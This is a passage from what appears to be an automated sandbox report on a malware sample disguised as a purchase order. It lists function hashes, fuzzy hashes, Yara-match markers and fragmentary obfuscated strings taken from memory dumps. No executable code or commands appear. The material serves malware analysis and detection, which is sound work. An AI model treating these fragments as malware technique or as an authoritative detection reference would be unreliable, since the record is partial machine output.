                                                                                                                            • Instruction ID: b7020f156436d39a0f1fc2da162041b921fb7ba1ec00009d7ce50215b5d5dc9e
                                                                                                                            • Opcode Fuzzy Hash: c480d061f790595793d86a8de7c79482d8cc313ed42ae9711a78e442725c0189
                                                                                                                            • Instruction Fuzzy Hash: 0721537AA00119ABDB15EF7AD945AAFBBF8EF54650F044196F905E3200E730DA01EBA1
                                                                                                                            Strings
                                                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01B002E7
                                                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01B002BD
                                                                                                                            • RTL: Re-Waiting, xrefs: 01B0031E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                            • API String ID: 0-2474120054
                                                                                                                            • Opcode ID: cb57353d320112732ae778b55bcb9f09a64863992cbf441b1e2075b605de57d8
                                                                                                                            • Instruction ID: 8abc30f3000856694469bcc0d1ae78a3d3557d4dfe794d1ae4edaa0a0c721b12
                                                                                                                            • Opcode Fuzzy Hash: cb57353d320112732ae778b55bcb9f09a64863992cbf441b1e2075b605de57d8
                                                                                                                            • Instruction Fuzzy Hash: 13E1CF306047819FD72ADF28C884B6ABBE4FB48754F180A9DF5A5CB2E2D774D944CB42
                                                                                                                            Strings
                                                                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01B07B7F
                                                                                                                            • RTL: Resource at %p, xrefs: 01B07B8E
                                                                                                                            • RTL: Re-Waiting, xrefs: 01B07BAC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                            • API String ID: 0-871070163
                                                                                                                            • Opcode ID: c6b83f50d965416b258cffcc07171c37926d65ca583ba1d41daff96e9663c067
                                                                                                                            • Instruction ID: f4a6deb0de122375a92f8ce0401a38a843009115d508d3d5b2b282b4f473ccfa
                                                                                                                            • Opcode Fuzzy Hash: c6b83f50d965416b258cffcc07171c37926d65ca583ba1d41daff96e9663c067
                                                                                                                            • Instruction Fuzzy Hash: 6C41D3317007039FD725DE29C851B66BBE5EB98B10F100A5DF99AD7780DB32E4058BA1
                                                                                                                            APIs
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B0728C
                                                                                                                            Strings
                                                                                                                            • RTL: Resource at %p, xrefs: 01B072A3
                                                                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01B07294
                                                                                                                            • RTL: Re-Waiting, xrefs: 01B072C1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                            • API String ID: 885266447-605551621
                                                                                                                            • Opcode ID: 7e7c441c578453b13c28789d22e51dcde3df3e6bf28b7bb312980075e005ce6b
                                                                                                                            • Instruction ID: 398983347a64cfacce8bda9a27fdffd5d00efec4938ec79a720545c7ee4baa54
                                                                                                                            • Opcode Fuzzy Hash: 7e7c441c578453b13c28789d22e51dcde3df3e6bf28b7bb312980075e005ce6b
                                                                                                                            • Instruction Fuzzy Hash: 16412031600206ABCB25CE29CC42F66FBA5FB55B10F10065CF996AB280DB31F806CBE0
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: %%%u$]:%u
                                                                                                                            • API String ID: 48624451-3050659472
                                                                                                                            • Opcode ID: a44ada77cba436a0ea89cb80ab2949dd842d7dcb3743333a9316335ca0f9e332
                                                                                                                            • Instruction ID: 8ed39626c23e292dae9e9262e8d7964884400224983bf409ce75a166b90b00f9
                                                                                                                            • Opcode Fuzzy Hash: a44ada77cba436a0ea89cb80ab2949dd842d7dcb3743333a9316335ca0f9e332
                                                                                                                            • Instruction Fuzzy Hash: F1315472A00619AFDB24DF2DDD84BEEB7F8EF54610F4445D5F949E3240EB309A44ABA0
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __aulldvrm
                                                                                                                            • String ID: +$-
                                                                                                                            • API String ID: 1302938615-2137968064
                                                                                                                            • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                            • Instruction ID: af78a784faefd9e39737c1d6b7d9b17b200cd585ea50a47c783c18aa50626322
                                                                                                                            • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                            • Instruction Fuzzy Hash: F791B571E00A169ADB38CFADC8816BEBBB1FF48728F54455AE957E72C0DB348940CB51
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $$@
                                                                                                                            • API String ID: 0-1194432280
                                                                                                                            • Opcode ID: dee97e2d675ece554c248ee58425a1deae48fbf1d9bc9fec7af81ef20ee37a4e
                                                                                                                            • Instruction ID: 74715a3fd59259087b22e01697b8fab372ea7ae0d369d77cdf755a346b400b4f
                                                                                                                            • Opcode Fuzzy Hash: dee97e2d675ece554c248ee58425a1deae48fbf1d9bc9fec7af81ef20ee37a4e
                                                                                                                            • Instruction Fuzzy Hash: 7E810C71D002699BDB75DB94CD44BEEB7B8AF48754F0441DAEA19B7240E7309E84CFA0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: j$$=$($8^$=$L7$O5$Z$[$[$[5$]$d&$fX$k^$q$sw$y$}$4
                                                                                                                            • API String ID: 0-2360868250
                                                                                                                            • Opcode ID: 07b4afcba548320085603d41395a70a88b48b3e91e702d77237f01df1c52075e
                                                                                                                            • Instruction ID: ffe0e5e9e0b568e5b4fa63f76f4e4dd5f1d2df0ddfc71665d625c2d6e8b379f5
                                                                                                                            • Opcode Fuzzy Hash: 07b4afcba548320085603d41395a70a88b48b3e91e702d77237f01df1c52075e
                                                                                                                            • Instruction Fuzzy Hash: A412E0B4E16229CFEB28CF49C8947EDBBB2BF85308F1481D9D4496B285C7B51A85CF41
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 6$O$S$\$s
                                                                                                                            • API String ID: 0-3854637164
                                                                                                                            • Opcode ID: b7d0034783b993231ae93bba56965397c5b8b96306e4b5aa6429389a8463abe2
                                                                                                                            • Instruction ID: 5d32097e5d9861ef695483a6b5b609aecd35380901b34e62d5c2a51456bd5f84
                                                                                                                            • Opcode Fuzzy Hash: b7d0034783b993231ae93bba56965397c5b8b96306e4b5aa6429389a8463abe2
                                                                                                                            • Instruction Fuzzy Hash: DE51A672D11318AFDF10DFD8DC45EEEB378EF84710F148199ED089A140E7B59A948BA5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: "1$~!
                                                                                                                            • API String ID: 0-4146445991
                                                                                                                            • Opcode ID: 639cc635f774ca0338b75a683a153f6e21b4ced9507b621540147d22da56499b
                                                                                                                            • Instruction ID: 55fd341d0a52541f31f4693fb65b794100e883caab2f612eb3737a0521822a26
                                                                                                                            • Opcode Fuzzy Hash: 639cc635f774ca0338b75a683a153f6e21b4ced9507b621540147d22da56499b
                                                                                                                            • Instruction Fuzzy Hash: 9301D7B6C11219AF8B50EFE8D8419EEBBF8AB18200F14466AD505F6240F7749A448FA1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: "
                                                                                                                            • API String ID: 0-1165748306
                                                                                                                            • Opcode ID: 9a43477422ecfde0ed53a9224819f6ab075015e11c3c32de38f19afbf712c515
                                                                                                                            • Instruction ID: 4ed5262dfbcb1b44f4877eb1f2d3c1c366fc44cfb22359ec0c5db92e480a1a3f
                                                                                                                            • Opcode Fuzzy Hash: 9a43477422ecfde0ed53a9224819f6ab075015e11c3c32de38f19afbf712c515
                                                                                                                            • Instruction Fuzzy Hash: 572130B6D11219AF8B00DFE9D8419EFB7F9FF98210F04466AE915E7204E7709A548BE0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 6r
                                                                                                                            • API String ID: 0-1993249690
                                                                                                                            • Opcode ID: 5a475c1fd64906f5f025767121e17dd43e83d4b976390659b15a8ec84352b1bd
                                                                                                                            • Instruction ID: 1431f0973364b09fe48c64303834dd82f767f55fb713d6bd9f8aa996ae1f80d7
                                                                                                                            • Opcode Fuzzy Hash: 5a475c1fd64906f5f025767121e17dd43e83d4b976390659b15a8ec84352b1bd
                                                                                                                            • Instruction Fuzzy Hash: D1111FB6D1121DAF9B00DFE9D8419EEBBFDEF48210F14456AE909E7200E7759A00CBE1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0f0353a976d93377e610bf09b771834532060c9b4b0aee289e3646305e196795
                                                                                                                            • Instruction ID: 310b3b7c5e11859ef8ed7d92a9c2a614715a7f5cdcd1d3befc0af372c14853e9
                                                                                                                            • Opcode Fuzzy Hash: 0f0353a976d93377e610bf09b771834532060c9b4b0aee289e3646305e196795
                                                                                                                            • Instruction Fuzzy Hash: B641F1B1D11219AFDB04DF99C885AEEBBBCFF49710F10415AFA14E6240E7B59681CBE0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cf6ed1507c048202a8380901b20853abf16bc6de9ff7b6f9047b8a115ef48fb3
                                                                                                                            • Instruction ID: 1aef836bf39423618528e1fd70212b425a8347a51a9f8a1967541ab63d9ecdd5
                                                                                                                            • Opcode Fuzzy Hash: cf6ed1507c048202a8380901b20853abf16bc6de9ff7b6f9047b8a115ef48fb3
                                                                                                                            • Instruction Fuzzy Hash: 343127B5A00608AFDB10DFA9C840EEFB7F9EF88700F108619F918A7340D774A951CBA0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5d70121d21914185a18db6d01ed80ca7d508067f521cbbc7796229021d8daec4
                                                                                                                            • Instruction ID: 14e29c260ebf584604869add9eb6519d1ff24b3ad8ccd5a2b8e3ad379762fddd
                                                                                                                            • Opcode Fuzzy Hash: 5d70121d21914185a18db6d01ed80ca7d508067f521cbbc7796229021d8daec4
                                                                                                                            • Instruction Fuzzy Hash: 5E214AB5A10709ABDB50DF68DC41EEFB7B8EF88700F10451DF9189B281DBB4A951CBA1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 25b18df5678153bc5923fa7573696ab297a4478d8ab3a4e71ffa8f91d7ab67c5
                                                                                                                            • Instruction ID: 6ae4e85e8b2ddc1c893302a100b4ab68e76378c3dbc116f8405b0dbcff3f3528
                                                                                                                            • Opcode Fuzzy Hash: 25b18df5678153bc5923fa7573696ab297a4478d8ab3a4e71ffa8f91d7ab67c5
                                                                                                                            • Instruction Fuzzy Hash: 0D11A3763803057BF720EE198C42FAB775C9B84F20F244015FB14AE2C1D6E5F88246B8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 46a6bf4ad95f33546e795f44d6ff258994b1487d7f7f38bc391b9097c11bbe26
                                                                                                                            • Instruction ID: 9665e3c7f0cbf20be517d6dcfd777c5787103603e98e690877bf1eaa3e41c77d
                                                                                                                            • Opcode Fuzzy Hash: 46a6bf4ad95f33546e795f44d6ff258994b1487d7f7f38bc391b9097c11bbe26
                                                                                                                            • Instruction Fuzzy Hash: 66119075511719ABE720EF68CC41FEBB3ACEB85700F10461EF9189B281DBB56941CBA0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8cf869b84da2e677cde3e514bf77ca522b6e9b483428207a7ca8a5e1cae373bf
                                                                                                                            • Instruction ID: afde3450aeb8a92009e7b7236c8e471f31218f095eaa0706c111077607761862
                                                                                                                            • Opcode Fuzzy Hash: 8cf869b84da2e677cde3e514bf77ca522b6e9b483428207a7ca8a5e1cae373bf
                                                                                                                            • Instruction Fuzzy Hash: 3611B275611715ABE720EF68CC41FAFB3ACEF84700F10461DF9189B281DBB56941CBA1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                                                                                            • Instruction ID: bf1cb564d3d1b454656e8b9edeb432966c7d64033fb87d740143e966d9b8cda6
                                                                                                                            • Opcode Fuzzy Hash: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                                                                                            • Instruction Fuzzy Hash: F701AEB6210608BBCB44DE9DDC80EDB77ADAB8C710F008208BA19A7241D670F8518BA4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 411207d8587c24a395348c70979ae5aa345640031a6cae91881f5f34d0dd53fd
                                                                                                                            • Instruction ID: 738333d6e3d03a75d8b8dd6c7407180eafd9b6358b4719d48fbf3a548ab6c113
                                                                                                                            • Opcode Fuzzy Hash: 411207d8587c24a395348c70979ae5aa345640031a6cae91881f5f34d0dd53fd
                                                                                                                            • Instruction Fuzzy Hash: D1F0BB7351521767D710AF5DBC40B96F79CEB95330F240226F95C8B282D772D4918390
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 25ecb6bf2a448980e5a57064e2dd1879b49d137cb7a586a0f03e4685d1d0a6e8
                                                                                                                            • Instruction ID: 7b2623a9836c1d1d76e91e3e8137c63eeae6797ccf57ffaed64f6db0834472ee
                                                                                                                            • Opcode Fuzzy Hash: 25ecb6bf2a448980e5a57064e2dd1879b49d137cb7a586a0f03e4685d1d0a6e8
                                                                                                                            • Instruction Fuzzy Hash: BAF0F675C243086EEF10EFE9CC45EAE7378DFD4720F008389E8089A180F67089958B5A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4691c96d8d81143b437ca4f97799bd03263fa4e70748146f5b0961e75674bf37
                                                                                                                            • Instruction ID: d277fa445831aeac3e511a51fbd063c82129f9c14928a2c5c3f2dac571021320
                                                                                                                            • Opcode Fuzzy Hash: 4691c96d8d81143b437ca4f97799bd03263fa4e70748146f5b0961e75674bf37
                                                                                                                            • Instruction Fuzzy Hash: 87F01C76214604BBDB10EFA9DC41E9B77ACEFC8750F008509FA18A7241D770BD158BB4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: be98c509030c2ea581b490eed3ebf59809605963665b9a2a60d9c613e3bd7c53
                                                                                                                            • Instruction ID: 41b9896c0db318dd407544620724b8e3a649f107452136ba2c72d5b39ee0657c
                                                                                                                            • Opcode Fuzzy Hash: be98c509030c2ea581b490eed3ebf59809605963665b9a2a60d9c613e3bd7c53
                                                                                                                            • Instruction Fuzzy Hash: E8F05E71815209EBDB14CF64D841BDEBBB8EB04720F1043AEE8259B280E63597908781
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                                                                                            • Instruction ID: 039cc87bd1bc53f9556ff421f5fe8e677204f32725576127ebff23bd73c2f36c
                                                                                                                            • Opcode Fuzzy Hash: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                                                                                            • Instruction Fuzzy Hash: 98E06D76204304BBD714EE58DC40EAB77ACEFC8750F004409F908A7281D670BD10C7B4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 473c746b910a85d1364797c5b8ce6b0ed0b6d8d67083c2f15317aaf68b8c99ac
                                                                                                                            • Instruction ID: 707431f36f7cf6ae204cb4018d1ecf262810630cd406b54d378fb7761b43be63
                                                                                                                            • Opcode Fuzzy Hash: 473c746b910a85d1364797c5b8ce6b0ed0b6d8d67083c2f15317aaf68b8c99ac
                                                                                                                            • Instruction Fuzzy Hash: 17E0DF36A51A2027C220D68D9C05FABB39CCBD9F60F0D00A9FE18AB200E5A4A94186E4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 186e6c7721f9e7ab4cb97c2fe40417233b977bf3aeaacd3eae27a4da6970f6de
                                                                                                                            • Instruction ID: d93bec4cb8cf06d3b71500107fa15aa7ae75603602a9ece9dfe5003545e2a753
                                                                                                                            • Opcode Fuzzy Hash: 186e6c7721f9e7ab4cb97c2fe40417233b977bf3aeaacd3eae27a4da6970f6de
                                                                                                                            • Instruction Fuzzy Hash: 2AE06571925109EBDF08CF64D844A9DB7A8EF04720F1447AEE816CB240D33587D08740
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
Strings
• String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
• API String ID: 0-1002149817
Strings
• String ID: $=$($8^$=$L7$O5$Z$[$[$]$d&$fX$k^$q$y$}$4
• API String ID: 0-2955521445
Strings
• String ID: $=$($8^$=$L7$O5$Z$[$[$]$d&$fX$k^$q$y$}$4
• API String ID: 0-2955521445
Strings
• String ID: $.$F$P$e$i$l$m$o$o$r$s$x
• API String ID: 0-392141074
Strings
• String ID: $.$F$P$e$i$l$m$o$o$r$s$x
• API String ID: 0-392141074
Strings
• String ID: "#CO$@Z\X$A\YO$A^[^$G$';$G7^^$ZA_A$ZA_O$Z\XA$Z\XA\Y$\Y$^V^Y$o
• API String ID: 0-1090279348
Strings
• String ID: D$\$e$e$i$l$n$r$r$w$x
• API String ID: 0-685823316
Strings
• String ID: .$P$e$i$m$o$r$x
• API String ID: 0-620024284
Strings
• String ID: F$P$T$f$r$x
• API String ID: 0-2523166886
Strings
• String ID: C$Z$[$`$f$p
• API String ID: 0-518084781
Strings
• String ID: $i$l$o$u
• API String ID: 0-2051669658
Strings
• String ID: $i$l$o$u
• API String ID: 0-2051669658
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $e$k$o
                                                                                                                            • API String ID: 0-3624523832
                                                                                                                            • Opcode ID: 7ed2013f33c7443f5a17a214e74812ffc78b8b754efadb3e995bc0177c4c79b3
                                                                                                                            • Instruction ID: 32a69fc084291f0dc56c40e68f0a2d9ff9adb7c7772ea6278c4879e926153281
                                                                                                                            • Opcode Fuzzy Hash: 7ed2013f33c7443f5a17a214e74812ffc78b8b754efadb3e995bc0177c4c79b3
                                                                                                                            • Instruction Fuzzy Hash: CFB13BB5A00709AFDB24DBA8DC85FEFB7FDAF88700F148559F619A7240D670AA41CB50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $e$h$o
                                                                                                                            • API String ID: 0-3662636641
                                                                                                                            • Opcode ID: b86888f39945026197ae74827de75efca9d8e2664e076802944b34d9c2a88cf6
                                                                                                                            • Instruction ID: 238a23ebc9abb287eec72c93257612e0db66510eb0fb2f501047884be3c42c50
                                                                                                                            • Opcode Fuzzy Hash: b86888f39945026197ae74827de75efca9d8e2664e076802944b34d9c2a88cf6
                                                                                                                            • Instruction Fuzzy Hash: 8A8176B68112186BEB15EB94DC85FFE737CFF48700F44859AE509A6140EBB45BC58FA0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
